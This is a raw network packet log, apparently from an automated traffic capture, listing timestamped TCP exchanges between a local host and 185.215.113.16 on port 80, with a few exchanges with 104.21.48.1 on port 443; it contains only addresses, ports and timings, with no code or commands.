                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.545074940 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.545212030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.545267105 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.546200991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.546667099 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.546726942 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.547225952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.547286987 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.547561884 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.547892094 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.548373938 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.548566103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.548676014 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.549525976 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.549639940 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.549710989 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.550775051 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.550851107 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.551043034 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.551156998 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.551595926 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.551635981 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.552047968 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.552696943 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.552709103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.552745104 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.552755117 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.554064035 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.554289103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.554335117 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.554869890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.554915905 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.555169106 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.555214882 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.556027889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.556128025 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.556406975 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.556446075 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.556915045 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.556960106 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.694876909 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.694927931 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.694981098 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.695023060 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.695364952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.695411921 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.695700884 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.695736885 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.696458101 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.696500063 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.697285891 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.697335958 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.697525978 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.697607040 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.697880030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.697918892 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.698637962 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.698724985 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.698936939 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.698985100 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.699676037 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.699731112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.699893951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.699937105 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.700771093 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.700823069 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.701041937 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.701088905 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.701883078 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.701894999 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.701925993 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.701936960 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.702953100 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.703015089 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.703299046 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.703349113 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.704142094 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.704335928 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.704427004 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.704466105 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.705115080 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.705203056 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.705450058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.705490112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.706227064 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.706276894 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.706355095 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.706397057 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.707252979 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.707289934 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.708426952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.708439112 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.708451033 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.708466053 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.708479881 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.708502054 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.709472895 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.709511995 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.709944010 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.709980965 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.710521936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.710563898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.711204052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.711258888 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.711596966 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.711633921 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.712688923 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.712712049 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.712727070 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.712728024 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.712748051 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.712764025 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.713772058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.713819981 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.714131117 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.714169979 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.714899063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.714989901 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.715132952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.715745926 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.715919018 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.716039896 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.716289997 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.716340065 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.717003107 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.717039108 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.717201948 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.717282057 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.718199968 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.718209982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.718235016 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.718257904 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.719300985 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.719413042 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.720309019 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.720321894 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.720365047 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.720551968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.720711946 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.720983982 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.721415997 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.721427917 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.721451044 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.721468925 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.722531080 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.722572088 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.722675085 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.722712994 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.723603010 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.723644018 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.723792076 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.723851919 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.724622965 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.724677086 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.724963903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.725009918 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.725718975 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.725778103 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.726341009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.726594925 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.726774931 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.726819038 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.727205038 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.727247953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.728044987 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.728086948 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.728216887 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.728293896 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.729101896 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.729154110 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.729240894 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.729331970 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.730181932 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.730226040 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.730729103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.730766058 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.731308937 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.731359959 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.731434107 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.731473923 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.732139111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.732194901 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.732278109 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.732340097 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.733335018 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.733371019 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.734035015 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.734088898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.734354019 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.734416962 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.734792948 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.734893084 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.735562086 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.735603094 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.735847950 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.735937119 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.736527920 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.736603975 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.736763954 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.736805916 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.737710953 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.737813950 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.737842083 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.737858057 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.738758087 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.738862991 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.738985062 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.739111900 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.739753008 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.739854097 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.739857912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.739921093 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.740854025 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.740921974 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.741082907 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.741180897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.741939068 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.741997004 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.742589951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.742645025 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.743011951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.743057966 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.743822098 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.743865013 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.744107008 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.744118929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.744164944 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.745176077 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.745534897 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.745583057 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.746268034 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.746310949 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.746728897 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.746786118 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.747376919 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.747422934 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.747589111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.747639894 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.748481989 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.748519897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.748547077 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.748583078 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.749495029 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.749938965 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.749984026 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.750627995 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.750639915 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.750674009 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.751627922 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.753103971 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.967818022 CET44349979104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.967909098 CET44349979104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.969172001 CET49979443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.971106052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.971173048 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.971272945 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.971525908 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.971576929 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.971761942 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.971801043 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.971992970 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.972031116 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.972987890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.973028898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.973380089 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.973985910 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.974028111 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.974447012 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.975045919 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.975059032 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.975091934 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.975110054 CET4996980192.168.2.6185.215.113.16
